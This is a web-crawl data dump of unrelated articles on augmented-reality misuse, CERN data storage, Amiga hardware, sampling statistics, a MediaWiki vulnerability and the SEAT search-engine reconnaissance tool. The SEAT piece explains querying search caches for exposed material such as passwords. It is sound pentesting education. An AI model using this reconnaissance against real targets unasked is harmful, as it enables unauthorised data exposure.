text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Most new products begin life with a marketing pitch that extols the product’s virtues. A similarly optimistic property holds in user-centered design, where most books and classes take for granted that interface designers are out to help the user. Users themselves are assumed to be good natured, upstanding citizens somewhere out of the Leave it to Beaver universe. In reality, however, the opposite is often true. Products have substantial flaws, technology designers seek ways to extract money from users, and many users twist well intentioned technology in ways the designers never expected, often involving baser instincts. These realities should come as no surprise to security professionals who are usually most effective when assuming the worst in people. One sure to be abused emerging technology is augmented reality. Augmented reality technologies overlay computer generated data on a live view of the real world. Anticipated application domains include entertainment, travel, education, collaboration, and law enforcement, among numerous others. A pragmatic, and advertisement laden, view of future augmented reality by YouTube user rebelliouspixels Augmented reality bears great promise as exemplified by Google’s highly optimistic “Project Glass: One day…” video. In the video, a theoretical descendent of Google’s Project Glass helps the user navigate a city, communicate, learn the weather, and otherwise manage his day. A day after Google posted the video, YouTube user rebelliouspixels posted a parody video “ADmented Reality” that remixed Google’s Project Glass vision with Google Ads. As we look to the future, this less optimistic view likely will be closer to the mark. It is important for the security community to start considering unintended, malicious, and evil applications now, before we see widespread adoption of augmented reality technologies. In this article, we combine augmented reality with reasonable assumptions of technological advancement, business incentives, and human nature to present less optimistic, but probable, future augmented reality applications. Admittedly, some are dystopian. We end with suggestions for the security and usability communities to consider now — so that we may be better prepared for our future of augmented reality and the threats and opportunities it presents. We do not intend to propose science fiction, but instead consider technologies available today or likely to arrive in the next five to ten years. Unless otherwise stated, we assume the capabilities and overall popularity of today’s iPhone/iPad – always on networking, high resolution video cameras, microphones, audio, voice recognition, location awareness, ability to run third-party applications, and processing support from back-end cloud services – but resident in a lightweight set of eyewear with an integrated heads-up display. Learning from the past As we consider potential misuse and risks associated with augmented reality we can learn a great deal from past desktop applications and current iPhone and Android apps to gain insight into both human nature and technical possibilities. From this analysis we identify at least three primary threat categories. The first category is simplest, current applications that are easily ported to future systems, with little to no augmentation. The next category includes hybrid threats that are likely to evolve due to enhanced capabilities provided by augmented reality. The final category, and the hardest to predict, are entirely new applications which have little similarity to current applications. These threats will lean heavily on new capabilities and have the potential to revolutionize misuse. In particular, these applications will spring from widespread use, always on sensing, high speed network connectivity to cloud based data sources, and, perhaps most importantly, the integration of an ever present heads-up display, that current cell phones and tablets lack. Regardless from which category new threats emerge, we assume that human nature and its puerile and baser aspects will remain constant, acting as a driving force for the inception of numerous malicious or inappropriate applications. This section lists potential misuse applications for augmented reality. Of course, we do not mean to imply that Google or any other company would endorse or support these applications, but such applications will likely be in our augmented future nonetheless. Persistent cyber bullying In the world defined by Google Glasses users are given unparalleled customizability of digital information overlaid on top of the physical environment. Through these glasses this information gains an anchor into the physical space and allows associations that other individuals can also view, share, vote on, and interact with just as they would via comments on YouTube, Facebook, or restaurant review sites. Persistent virtual tagging opens up the possibility of graffiti or digital art overlaid upon physical objects, but only seen through the glasses. However, hateful or hurtful information could just as easily be shared among groups (imagine what the local fraternity could come up with) or widely published to greater audiences just as it can today, but gains an increasing degree of severity when labeling becomes a persistent part of physical interactions. Imagine comments like “Probably on her period” or “Her husband is cheating” being part of what appears above your head or in a friend’s glasses, without your knowledge. Such abuse isn’t limited to adult users. The propensity for middle and high school age youth to play games that embarrass others is something to be expected. The bright future predicted by Google may be tainted by virtual “kick me” signs on the backs of others which float behind them in the digital realm. Lie detection and assisted lying Augmented reality glasses likely will include lie detection applications that monitor people and look for common signs of deception. According to research by Frank Enos of Columbia University, the average person performs worse than chance at detecting lies based on speech patterns and automated systems perform better than chance. Augmented reality can exploit this. The glasses could conduct voice stress analysis and detect micro-expressions in the target’s face such as eye dilation or blushing. Micro-expressions are very fleeting, occurring in 1/15 of a second, beyond the capabilities of human perception. However, augmented reality systems could detect these fleeting expressions and help determine those attempting to hide the truth. An implication is that people who use this application will become aware of most lies told to them. It could also provide a market for applications that help a person lie. Gamblers, students, and everyday people will likely use augmented reality to gain an unfair advantage in games of chance or tests of skill. Gamblers could have augmented reality applications that will count cards, assist in following the “money card” in Three Card Monte, or provide real-time odds assessments. Students could use future cheating applications to look at exam questions and immediately see the answers. Future augmented reality applications will likely assist cheating. In this notional example the student sees the answers by simply looking at the test. Theft and other related crimes may also be facilitated by augmented reality. For example, persistent tagging and change detection could be used to identify homes where the occupants are away on vacation. We anticipate augmented reality will perform at levels above human perception. Applications could notice unlocked cars or windows and alert the potential criminal. When faced with a new type of security system, the application could suggest techniques to bypass the device, a perverted twist on workplace training. The Google Glass video depicted the user calling up a map to find a desired section of a book store. We anticipate similar applications that might provide escape routes and locations of surveillance cameras. Law enforcement detection We also anticipate other applications to support law breaking activities. Today’s radar and laser detectors may feed data into drivers’ glasses as well as collaboratively generated data provided by other drivers about locations of traffic cameras and speed traps. Newer sensors, such as thermal imaging, may allow drivers to see police cars hidden in the bushes a mile down the road. License plate readers and other machine vision approaches will help unmask undercover police cars. Counter law enforcement applications will certainly move beyond just driving applications and may assist in recognizing undercover or off duty police officers, or even people in witness protection programs. Front and rear looking cameras would allow users to see behind them and collaborative or illicit sharing of video feeds would allow users to see around corners and behind walls. Average citizens may use their glasses to record encounters with police, both good and bad. Law enforcement variants of augmented reality may dramatically change the interaction between police officers and citizens. The civil liberties we enjoy today, such as freedom of speech and protection against self-incrimination, will certainly be affected by impending augmented reality technology. What might be relatively private today (such as our identity, current location, or recent activity) will be much more difficult to keep private in a world filled with devices like Google Glasses. A key enabler of future augmented reality systems is facial recognition. Currently, facial recognition technology is in a developmental stage, and only established at national borders or other areas of high security. Ralph Gross, a researcher at the Carnegie Mellon Robotics Institute, claims that current facial recognition technology is becoming more capable of recognizing frontal faces, but struggles with profile recognition. Current technology also has problems recognizing faces in poor lighting and low resolution. We anticipate significant advances during the next decade. Law enforcement agencies, like the police department in Tampa, Florida, have tested facial recognition monitors in areas with higher crime rates, with limited success. The primary cause behind these failures has been the inability to capture a frontal, well lit, high resolution image of the subject. This obstacle blocking effective facial recognition would be quickly removed in a world where augmented reality glasses are common and facial images are constantly being captured in everyday interactions. While facial recognition via augmented reality (through glasses or mobile devices) might seem harmless at first glance, a deeper look into this new technology reveals important unintended consequences. For example, a new form of profiling may emerge as a police officer wearing augmented reality glasses might recognize individuals with prior criminal records for which the subjects have already served their time. Without augmented reality, that police officer would have likely never recognized the offenders or known of their crimes. Of course augmented reality may be very beneficial to law enforcement activities, but raises serious questions about due process, civil liberties, and privacy. The end result may be a chilling effect on the population as a whole, both guilty and innocent. Dating and stalking Augmented reality opens the flood gates to applications for dating and stalking. Having a set of eyeglasses that records and posts your location on social networks means that everybody you know can see where you are. For example, a man sits down at a bar and looks at another women through his glasses, and her Facebook or Google+ page pops up on his screen (since she did not know to limit her privacy settings). While augmented reality brings vastly new and exciting opportunities, the technology threatens to eliminate the classic way of meeting and getting to know people: by actually spending time with them. Consider an application that already exists: “Girls Around Me,” -it uses data from social networking sites to display locations of nearby girls on a map. According to Nick Bilton of The New York Times, this application “definitely wins the prize for too creepy.” The evolution of such applications combined with augmented reality opens up numerous other possibilities. Perhaps the glasses will suggest pick-up lines based on a target’s interests, guess people’s ages, highlight single women (or married women), make people more attractive (virtual “beer goggles”), or provide “ratings” based on other users’ feedback. Lie detection applications will likely be in frequent use, and misuse. Expect continuous innovation in this domain. We anticipate that augmented reality will be used to emulate or enhance drug use. History has taught us recreational drugs will always be in demand as will be additional means of enhancement. Some may recall the combination of drugs with Pink Floyd laser light shows. Others may have experimented with Maker SHED’s Trip Glasses which suggests users “Enjoy the hallucinations as you drift into deep meditation, ponder your inner world, and then come out after the 14-minute program feeling fabulous” or the audio approaches suggested by Brad Smith’s DEFCON 18 “Weaponizing Lady GaGa” talk. Augmented reality will open up significant and sought after possibilities. Let’s face it, porn is a driving force behind Internet and technological growth, and we believe the same will hold true for augmented reality. Augmented reality will facilitate sexual activities in untold ways including virtual sexual liaisons, both physical and virtual, local and at a distance. Advanced sensors may allow penetration of clothing or the overlay of exceptionally endowed features on individuals in the real world, perhaps without their knowledge. The advice frequently given in public speaking classes, “Imagine the audience naked,” takes on entirely new meaning in this era. There are more than 300 million people in the United States alone and more than that number of mobile phones. Imagine if even one third of this group actively wore and used augmented reality glasses. That would mean 100 million always-on cameras and microphones wielded by adults, teenagers, and children continually feeding data to cloud-based processors. Virtually no aspect of day-to-day life will be exempt from the all seeing eye of ubiquitous and crowdsourced surveillance. Businesses will be incentivized to collect, retain, and mine these data flows to support business objectives, such as targeted advertising, and governments will covet and seek access to this data for security and law enforcement aims. The implications of the privacy of the individual citizen and the chilling effect on society as a whole could be profound. People have long been concerned about the danger of billboards when driving, because they take drivers’ eyes off the road. Text messaging while driving is widely illegal because of the distraction it causes. Now consider augmented reality glasses with pop-up messages that appear while a person drives, walks across a busy intersection, or performs some other activity requiring their full attention. For anybody wearing the glasses, text messaging or advertising alerts and similar interruptions would be very distracting and dangerous. You’ve likely seen, on many occasions, drivers attempting to use their cell phones and their resultant erratic driving. Augmented reality devices encourage such “multitasking” behavior at inappropriate times. The results will not be pretty. People today do stupid things (see the movie Jackass for textbook examples), and in the future, people will continue to do stupid things while wearing augmented reality glasses. One commenter on Google’s YouTube video, PriorityOfVengence1, suggested that someone might even commit suicide wearing Google Glasses. The context of this comment refers to the end of the video when the main character is on a roof video chatting with his girlfriend and says “Wanna see something cool?” PriorityOfVengence1’s comment received over sixty thumbs up in just three days. While some might laugh at the comment, it highlights a disturbing potential reality. What if people spiraling into depression began streaming their suicide attempts by way of their glasses? It is certainly possible — this and many other variations of augmented reality voyeurism should be anticipated. The focus of this article is on user applications that behave in accordance with the user’s wishes. However, if we expand our assumptions to allow for malicious software, options become even more interesting. With malicious software on the augmented reality device, we lose all trust in the “reality” that it presents. The possibilities are legion, so we will only suggest a few. The glasses could appear to be off, but are actually sharing a live video and audio feed. An oncoming car could be made to disappear while the user is crossing the street. False data could be projected over users’ heads, such as a spoofed facial recognition match from a sexual offender registry. For related malware research on today’s mobile technology see Percoco and Papathanasiou’s “This is not the droid you’re looking for…” from DEFCON 18 to begin envisioning additional possibilities. The era of ubiquitous augmented reality is rapidly approaching and with it amazing potential and unprecedented risk. The baser side of human nature is unlikely to change nor the profit oriented incentives of industry. Expect the wondrous, the compelling, and the creepy. We will see all three. However, we shouldn’t have to abdicate our citizenship in the 21st Century and live in a cabin in Montana to avoid the risks augmented reality poses. As security professionals we must go into this era with eyes wide open, take the time to understand the technology our tribe is building, and start considering the implications to our personal and professional lives before augmented reality is fully upon us. To live in the 21st Century today online access, social networking presence, and instant connectivity are near necessities. The time may come when always on augmented reality systems such as Google Glasses are a necessity to function in society; before that time however we must get ahead of the coming problems. The first few kids who walk into their SAT exams wearing augmented reality glasses and literally see the answers are going to open Pandora’s Box.
<urn:uuid:620f6013-44fc-4ff7-b572-7c340daa8e15>
CC-MAIN-2017-09
https://www.helpnetsecurity.com/2013/02/12/65279unintended-malicious-and-evil-applications-of-augmented-reality/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00503-ip-10-171-10-108.ec2.internal.warc.gz
en
0.940621
3,485
2.59375
3
Data locality plays a critical role in energy-efficiency and performance in parallel programs. For data-parallel algorithms where locality is abundant, it is a relatively straightforward task to map and optimize for architectures with user-programmable local caches. However, for irregular algorithms such as Breadth First Search (BFS), exploiting locality is a non-trivial task. Guang Gao, a professor in the Department of Electrical and Computer Engineering in the University of Delaware works on mapping and exploiting locality in irregular algorithms such as BFS. Gao notes, “there are only a few studies of the energy efficiency issue of the BFS problem, … and more work is needed to analyze energy efficiency of BFS on architectures with local storage.” In BFS, data locality is exploited in one of two ways: intra– and inter-loop locality. Intra-loop refers to locality within a loop body between adjacent loops. Inter-loop refers to locality between loop iterations in different loops. Exploiting both intra– and inter-loop locality is relatively simple assuming the programmer leverages a model that supports fine-grain parallelism. Typical approaches to irregular algorithms do not perform well under traditional coarse-grain execution models like OpenMP. Using BFS as their motivating example, Gao’s team exploits data locality using Codelet, a fine-grain data-flow execution model. In the Codelet model, units of computation are called codelets. Each codelet is a sequential piece of code that can be executed without interruption (e.g., no synchronization is required). Data dependence is specified between the codelets through a directed graph called the codelet graph. At execution time, the runtime schedules the codelets accordingly based on the dependencies. The Codelet model executes in the context of an abstract parallel machine model. The machine consists of many computing nodes stitched together via an interconnection network. Each node contains a many-core chip organized into two types of cores: CUs and SUs. This heterogeneity provides differing performance and energy profiles. Codelets that can benefit from a weaker core can be scheduled into one type of core to save energy. Conversely, a codelet that requires heavy-duty computation can be scheduled into a stronger core. By leveraging fine-grain data-flow execution models such as Codelet, Gao and his team are able to improve dynamic energy for memory accesses by up to 7% compared to the traditional coarse-grain OpenMP model.
<urn:uuid:ee212ab2-93e9-4187-aa36-669db164681f>
CC-MAIN-2017-09
https://www.hpcwire.com/2014/02/18/data-locality-cure-irregular-applications/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00503-ip-10-171-10-108.ec2.internal.warc.gz
en
0.927418
508
2.859375
3
Since restarting in June after a two-year upgrade, CERN's Large Hadron Collider (LHC) has been recording about 3GB of data per second, or about 25 petabytes -- that's 25 million gigabytes -- of data per year. Every time the LHC smashes particles together at near the speed of light in its 16 mile-long chamber, the shattered particles fly off in myriad of directions. Those particlaes leave behind traces in space, like footsteps in snow, which are recorded and later analyzed in a search for the most basic element of matter. But unlike a camera, which absorbs light in order to produce a photo, the traces that result from particle collisions pass through the LHC's "detectors," leaving many points of interaction in their path. Every point represents an action at a point in time that can help pinpoint the particle's characteristics. The detectors that record particle collisions have 100 million read-out channels and take 14 million pictures per second. It's akin to saving 14 million selfies with every tick of a watch's second hand. Needles and haystacks Guenther Dissertori, a professor of particle physics at CERN and the Swiss Federal Institute of Technology in Zurich, said the task of finding matter's most basic particle is vastly more difficult than finding that proverbial needle in a haystack. "The search for the particle is more than a search for a needle in a haystack. We get 14 million haystacks per second - and unfortunately the needle also looks like hay," Dissertori said. "The amount of data produced at CERN was impressive 10 years ago, but is not as impressive as what's produced today." Dissertori said CERN's public-private partnerships could solve the expected technological hurdles, including the need for new storage technologies that can save exabytes of data in the future. Unlike Google or Amazon, two Internet companies that spend billions of dollars every year to develop new technology, CERN has limited money; it's funded by 21 member states and has an annual budget of around $1.2 billion. "We have to be very creative to find solutions, Dissertori said. "We're forced to find the best possible ways to collaborate with [the IT] industry and get most out of it." Almost since its founding, CERN has been developing ways to improve data storage, cloud-technologies, data analytics and data security in support of its research. Its technological advancements have resulted in a number of successful research spin-offs from its primary particle work, including the World Wide Web, hypertext language for linking online documents and grid computing. Its invention of grid computing technology, known as the Worldwide LHC Computing Grid, has allowed it to distribute data to 170 data centers in 42 countries in order to serve more than 10,000 researchers connected to CERN. Storing data, sharing data During the LHC's development phase 15 years ago, CERN knew that the storage technology required to handle the petabytes of data it would create didn't exist. And researchers couldn't keep storing data within the walls of their Geneva laboratories, which already house an impressive 160PB of data. CERN also needed to share its massive data in a distributed fashion, both for speed of access as well as the lack of onsite storage. As it has the past, CERN developed the storage and networking technology itself, launching the OpenLab in 2001 to do just that. OpenLab is an open source, public-private partnership between CERN and leading educational institutions and information and communication technology companies, such as Hewlett-Packard. A growing grid In all, the LHC Computing Grid has 132,992 physical CPUs, 553,611 logical CPUs, 300PB of online disk storage and 230PB of nearline (magnetic tape) storage. It's a staggering amount of processing capacity and data storage that relies on having no single point of failure. In the next 10 to 20 years, data will grow immensely because the intensity of accelerator will be ramped up, according to Dissertori. "The electronics will be improved so we can write out more data packages per second than we do now," Dissertori said. Every LHC experiment at the moment writes data on a magnetic tape at the order of 500 data packets per second; each packet is a few megabytes in size. But CERN is striving to keep as much data as possible on disc, or online storage, so that researchers have instant access to it for their own experiments. "One interesting development is to see how can we implement it with data analysis within our cloud computing paradigm. For now, tests are ongoing on our cloud," Dissertori said. "I could very well imagine in near term future more things done in that direction." This story, "CERN's data stores soar to 530M gigabytes" was originally published by Computerworld.
<urn:uuid:8367d663-4d36-4cfa-ae5e-d78a16920712>
CC-MAIN-2017-09
http://www.itnews.com/article/2960642/cloud-storage/cerns-data-stores-soar-to-530m-gigabytes.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00027-ip-10-171-10-108.ec2.internal.warc.gz
en
0.952979
1,015
3.0625
3
Prototyping the hardware Modern chips are designed using high-powered workstations that run very expensive chip simulation software. However, the fledgling Amiga company could not afford such luxuries. It would instead build, by hand, giant replicas of the silicon circuitry on honeycomb-like plastic sheets known as breadboards. Breadboards are still used by hobbyists today to rapidly build and test simple circuits. The way they work is fairly simple. The breadboard consists of a grid of tiny metal sockets arranged in a large plastic mesh. Short vertical strips of these sockets are connected together on the underside of the board so that they can serve as junctions for multiple connectors. Small lengths of wire are cut precisely to length and bent into a staple-like shape, with the exposed wire ends just long enough to drop neatly into the socket. Small chips that perform simple logic functions (such as adding or comparing two small numbers in binary code) straddle the junctions, their centipede-like rows of metal pins precisely matching the spacing of the grid. The Lorraine prototype, with three custom "chips." Image courtesy of Secret Weapons of Commodore At the time, nobody had ever designed a personal computer this way. Most personal computers, such as the IBM PC and the Apple ][, had no custom chips inside them. All they consisted of was a simple motherboard that defined the connections between the CPU, the memory chips, the input/output bus, and the display. Such motherboards could be designed on paper and printed directly to a circuit board, ready to be filled with off-the-shelf chips. Some, like the prototypes for the Apple ][, were designed by a single person (in this case, Steve Wozniak) and manufactured by hand. The Amiga was nothing like this. Its closest comparison would be to the minicomputers of the day—giant, refrigerator-sized machines like the DEC PDP-11 and VAX or the Data General Eagle. These machines were designed and prototyped on giant breadboards by a team of skilled engineers. Each one was different and had to be designed from scratch—although to be fair, the minicomputer engineers had to design the CPU as well, a considerable effort all by itself! These minicomputers sold for hundreds of thousands of dollars each, which paid for the salaries of all the engineers required to construct them. The Amiga team had to do the same thing, but for a computer that would ultimately be sold for under $2,000. So there were three chips, and each chip took eight breadboards to simulate, about three feet by one and a half feet in size, arranged in a circular, spindle-like fashion so that all the ground wires could run down the center. Each board was populated with about 300 MSI logic chips, giving the entire unit about 7200 chips and an ungodly number of wires connecting them all. Constructing and debugging this maze of wires and chips was a painstaking and often stressful task. Wires could wiggle and lose their connections. A slip of a screwdriver could pull out dozens of wires, losing days of work. Or worse, a snippet of cut wire could fall inside the maze, causing random and inexplicable errors. However, Jay never let the mounting stress get to him or to his coworkers. The Amiga offices were a relaxed and casual place to work. As long as the work got done, Jay and Dave Morse didn't care how people dressed or how they behaved on the job. Jay was allowed to bring his beloved dog, Mitchy, into work. He let him sit by his desk and had a separate nameplate manufactured for him. Jay even let Mitchy help in the design process. Sometimes, when designing a complex logic circuit, one comes to a choice of layout that could go either way. The choice may be an aesthetic one, or merely an intuitive guess, but one can't help but feel that it should not be left merely to random chance. On these occasions Jay would look at Mitchy, and his reaction would determine the choice Jay would make. Slowly, the Amiga's custom chips began to take shape. Connected to a Motorola 68000 CPU, they could accurately simulate the workings of the final Amiga, albeit more slowly than the final product would run. But a computer, no matter how advanced, is nothing more than a big, dumb pile of chips without software to run on it.
<urn:uuid:c8c7db2e-5017-47e7-b80a-1e3b2968273e>
CC-MAIN-2017-09
https://arstechnica.com/gadgets/2007/08/a-history-of-the-amiga-part-3/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00203-ip-10-171-10-108.ec2.internal.warc.gz
en
0.977786
917
3.859375
4
In Part I, we provided an overview of the metrics arms race and had walked through the use of sampling in this regard. We had also discussed the importance of baking in recency of data during sampling and some of the pitfalls of sampling such as the sampling error. Recall that exact measurement of sampling error is not feasible as the true population values are generally unknown; hence, sampling error is often estimated by probabilistic modeling of the sample. Random sampling error is often measured using the margin of error statistic. The statistic denotes a likelihood that the result from a sample is close to the number one would get if the whole population had been used. When a single, global margin of error is reported, it refers to the maximum margin of error using the full sample. Margin of error is defined for any desired confidence level; typically, a confidence of 95% is chosen. For a simple random sample from a large population, the maximum margin of error, Em, is computed as follows: where, erf is the inverse error function and n is the sample size. In accord to intuition, maximum margin of error decreases with a larger sample size. It should be noted that margin of error only accounts for random sampling error and is blind to systematic errors. An underlying assumption of the formula above for the margin of error is that there is an infinitely large population and hence, margin of error does not depend on the size of the population (N) of interest. Given the real-time large volume of operational data, the assumption can be assumed to hold for practical purposes. Having said that, the aforementioned assumption is valid when the sampling fraction is small (typically less than 5%). On the other hand, if no restrictions – such as that n/N should be small, or N large, nor that the latter population is normal – are made, then, as per Isserlis, the margin or error should be corrected using the following: It is important to validate the underlying assumptions as sampling error has direct implications on analysis such as anomaly detection (refer to Part I). The following sampling methodologies have been extensively studied and used in a variety of contexts: N= Population size L = # strata Nh = Size of each stratum nh = Size of random sample drawn from statum h sh = sample standard deviation of stratum h mh = sample mean of stratum h This often improves the representativeness of the sample by reducing sampling error. On comparing the relative precision of Simple Random and Stratified Random Sampling, Cochran remarked the following: … stratification nearly always results in smaller variance for the estimated mean or total than is given by a comparable simple random sample. … If the values of nh are far from optimum, stratified sampling may have a higher variance. where, nh is the size of a random sample from a stratum. In the context of operations, let’s say that if one were to evaluate the Response Time of a website, the response time data should be divided into multiple strata based on geolocation and then analyzed. A variant of the above sets the start of the sampling sequence to (k+1)/2 if k is odd or to k/2 is k is even. In another variation, the N units are assumed to be arranged around a circle, a number between 1 and N is selected at random and then every k-th (where k = integer nearest to N/n) unit is sampled. The reader is referred for further reading on systematic sampling. Several variants of adaptive sampling have been proposed in the literature. For instance, in Locally Adaptive Sampling, intervals between samples is computed using a function of previously taken samples, called a sampling function. Hence, though it is a non-uniform sampling scheme, one need not keep sampling times. In particular, sampling time ti+1 is determined in the following fashion: We now walk through a couple of examples to illustrate the applicability of the sampling techniques discussed above. The plot below compares # Page Views across the different continents over a three-day period. The data was collected every hour. Note that the scale of the y-axis is logarithmic. Simple random or stratified random sampling of the time series in the plot above would render the subsequent comparison inaccurate owing to the underlying seasonality. This can be addressed by employing systematic sampling whereby #page views of the same hour for each day would be sampled. Subsequent comparison of the sampled data across different continents would be valid. The plot below compares Document Completion time across the different continents over a three-day period. The data was collected every hour. Note that the scale of the y-axis is in thousands of milliseconds. From the plot we note that, unlike # Page Views, Document Completion time does not exhibit a seasonal nature. Given the high variance of the Document Completion time, employing simple random sampling would incur a large sampling error. Consequently, in this case stratified random sampling – where a stratum would correspond to a day – can be employed and then the sampled data can be used for comparative analysis across the different continents. “Sampling techniques”, W. G. Cochran. “Adaptive Sampling”, Steven K. Thompson, George A. F. Seber By: Arun Kejariwal, Ryan Pellette, and Mehdi Daoudi
<urn:uuid:e4b5ec6b-e4c6-4764-af4b-f99b4d5044f6>
CC-MAIN-2017-09
http://blog.catchpoint.com/2016/11/04/sampling-types-example-use-cases/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170434.7/warc/CC-MAIN-20170219104610-00147-ip-10-171-10-108.ec2.internal.warc.gz
en
0.925734
1,116
3.296875
3
Photo: Gov. Riley Alabama Gov. Bob Riley last week unveiled Virtual Alabama, a comprehensive database of satellite imagery and aerial photography designed to assemble, display, evaluate and share critical data for emergency responders. Riley was joined by Google Earth Chief Technology Officer Michael T. Jones and Alabama Homeland Security Director Jim Walker to demonstrate the uses and capabilities of the new tool for state officials. At Riley's direction, the Alabama Department of Homeland Security and Google Earth have been working to create a visualization tool that provides a common operational picture across the state that first responders, county planners and other officials can use to get detailed geographic views overlaid with pertinent information. Equipped with the Google Earth platform, the state's Department of Homeland Security can model hazardous explosions with plume threat measurements and build three-dimensional models of schools, bridges and other critical structures. Virtual Alabama can overlay those models and satellite/aerial imagery with the locations of fire hydrants, gas pipelines, hazardous chemical data, and other important information that can help emergency personnel. With such data, Homeland Security officials can plan more effective disaster response scenarios and prepare emergency teams to be better equipped to respond to crises. For example, this information can be shared with local firefighters before they enter a burning building.
<urn:uuid:1ee061ed-54f9-4b90-a29a-e005f4611a61>
CC-MAIN-2017-09
http://www.govtech.com/geospatial/Governor-Riley-Unveils-Virtual-Alabama-to.html?topic=117676
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171232.43/warc/CC-MAIN-20170219104611-00023-ip-10-171-10-108.ec2.internal.warc.gz
en
0.884625
253
2.578125
3
SEAT – Search Engine Assessment Tool – is a tool dedicated to security professionals and/or pentesters . Using popular search engines, it search for interesting information stored in their caches. It also uses other types of public resources (see later). Popular search engines like Google or Yahoo! (non-exhaustive list) use crawlers (or robots) to surf the Internet, visit found websites, index the retrieved content and store it in databases [Note: A small tool to check when the Google bot last visited your site: gbotvisit.com]. What’s the concern with security? Web robots index everything (in reality, some filters may be defined via robots.txt files, but it’s not the scope of this post). Let’s assume that everything is cached. It means that unexpected content can be crawled by robots and made publicly available: - temporary pages - unprotected confidential material - sites under construction When you search something via Google, you just type a few words and expect some useful content to be retrieved. But, the search engines are able to process much more complex queries! Examples (for Google): - “site:rootshell.be foo” will search the string “foo” only in hosts *.rootshell.be. - “inurl:password” will search the string “password” on the URL only. - “ext:pdf exploit” will search the string “company” on PDF documents. There comes the power of SEAT! It will build complex queries against not only Google but well-known search engines. It comes with a pre-installed list with the most common sites but you’re free to add your own. Pre-configured search engines are: Google, Yahoo, Live, AOL, AllTheWeb, AltaVista and DMOZ. Once the queries performed (it may take quite some time of you configured multiple search), it display the results in a convenient way. Have a look at the GUI: The usage of SEAT is based on a three phases process (the three tabs on top of the window): - Preparation: You define here your target (a host, a domain name or IP addresses), and which type(s) of query you will perform. - Execution: You select here the search engine(s) you would like to use and how to query them (number of thread, sleep times, …). Then you start/pause/stop the query. Queries are multi-threaded and may have a side effect: Your IP can be blacklisted (Google has a powerful algorithm to prevent usage of tools like SEAT. Take care if you use it from your corporate LAN. All your company could be temporary blacklisted by Google! - Analysis: The last step is the analyze of the retried content. Once the analyze is performed (and it can take quite some depending of your targets/queries), results are already available. For each results, extra operations can be performed (by double-cliking the URL): - Direct request (Warning: this can reveal your IP address to the target) - Grab data from the Netcraft database - Grab a copy from archive.org - Grap a copy from Google cache SEAT is fully customizable: your own search engines, advanced queries can be added. Execution can be tuned (number of concurrent threads, User-Agent, sleep time between queries etc…) and, of course, results can be saved (export to .txt or .html files). Search engines databases are full of interesting information! Like repeated during the last ISSA meeting this week, if you search for information about a target, just ask! SEAT is a perfect tool to conduct an audit or pentest. A few words about the supported environment, SEAT is written in Perl (version 5.8.0-RC3 and higer) and requires the following modules: Gtk2, threads, threads::shared, XML::Smart. Check out the official website: midnightresearch.com.
<urn:uuid:c7010870-3a44-4b84-91c0-db39d4d0a227>
CC-MAIN-2017-09
https://blog.rootshell.be/2009/03/21/introduction-to-seat/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170521.30/warc/CC-MAIN-20170219104610-00495-ip-10-171-10-108.ec2.internal.warc.gz
en
0.890379
848
2.578125
3
3 Web Security Takeaways From Wikipedia's Near MissEven the most useful and benevolent websites have the potential to host malware. Last month, researchers in our Vulnerability Research Group found a critical vulnerability in MediaWiki, the open-source web platform that is used to create and maintain wiki websites, including Wikipedia.org, the sixth most visited website in the world. This critical vulnerability left the MediaWiki platform (version 1.8 onward) exposed to a remote code execution (RCE) attack. An attacker could have used this vulnerability to gain complete control of the Wikipedia web servers, potentially exposing Wikipedia's 94 million monthly visitors to malware or massive information disclosure. Since an update and patch has been issued to the MediaWiki software, the vulnerability has been exposed and resolved, so long as all MediaWiki users install the patch. However, there are still some useful lessons we can take away from this near miss. Lesson No. 1: Know your stack The RCE vulnerability was only the third of its kind found in the widely used, open-source MediaWiki platform since 2006. That's a good track record, but it demonstrates how easily organizations can be lulled into a false sense of security just because a vulnerability has not been announced in months or even years on the platforms they use. Web application server stacks expose a broad software surface for an attacker on the vulnerability hunt. Even the most minimal setups typically overlay a web framework (e.g., Wordpress) based on a platform language (PHP), using a database (MySQL) in a web server (Apache) over an operating system stack. Any of these components can be an exploitation candidate -- and we haven't even mentioned custom application business logic, imported JS libraries, plugins, mods, and other extras. The opportunities are abundant. In addition to keeping a vigilant eye for vulnerabilities on the development side, it's more important than ever to keep your software updated across the board. Make sure you are running recent versions of your framework and services, running on top of a modern OS with built-in exploit mitigation techniques and other native protections enabled, or look into threat prevention technology. Best-practices would recommend doing all three; follow your vendor's hardening guides. Lesson No. 2: Occam's razor still cuts true The slightly more modern version of Occam's razor is KISS (keep it simple, stupid). Both axioms hold true in this case: The simplest answer is usually the right one. Though we've seen a steady rise in sophisticated threat vectors, advanced persistent threats, mobile device breaches, DDoS attacks, and even international bank heists make headlines, relatively simple attacks through vulnerabilities like the one we discovered on the WikiMedia platform are still a very real and common threat. Worse, some input validation vulnerabilities tend to go unnoticed because the exploitation techniques are not particularly new or technically advanced. This presents an attractive target, since attackers are always looking for the path of least resistance. It's akin to putting up the "Beware of Dogs" sign, keeping a big dog in the backyard, arming your sophisticated home protection system with mobile alerts, bolting the front door, locking the back gate, and then leaving one of the front windows open. Sometimes those simple, obvious entry points are the most lucrative for criminals -- and the most overlooked by developers and site owners. Lesson No. 3: No such thing as a safe click Shahar Tal is the Vulnerability and Security Research Manager at Check Point Software Technologies. Prior to joining Check Point, he held leadership roles in the Israel Defense Force, where he was trained and served as an officer. He brings more than 10 years of industry ... View Full Bio Even the most trusted sites are susceptible to exploits like this RCE vulnerability. But if you put appropriate protections in place, you can detect and block infecting code before it spreads to your clients and servers. It's not practical to block employees on your network from all sites, and as this case shows, even the most useful and benevolent sites can host malicious code.
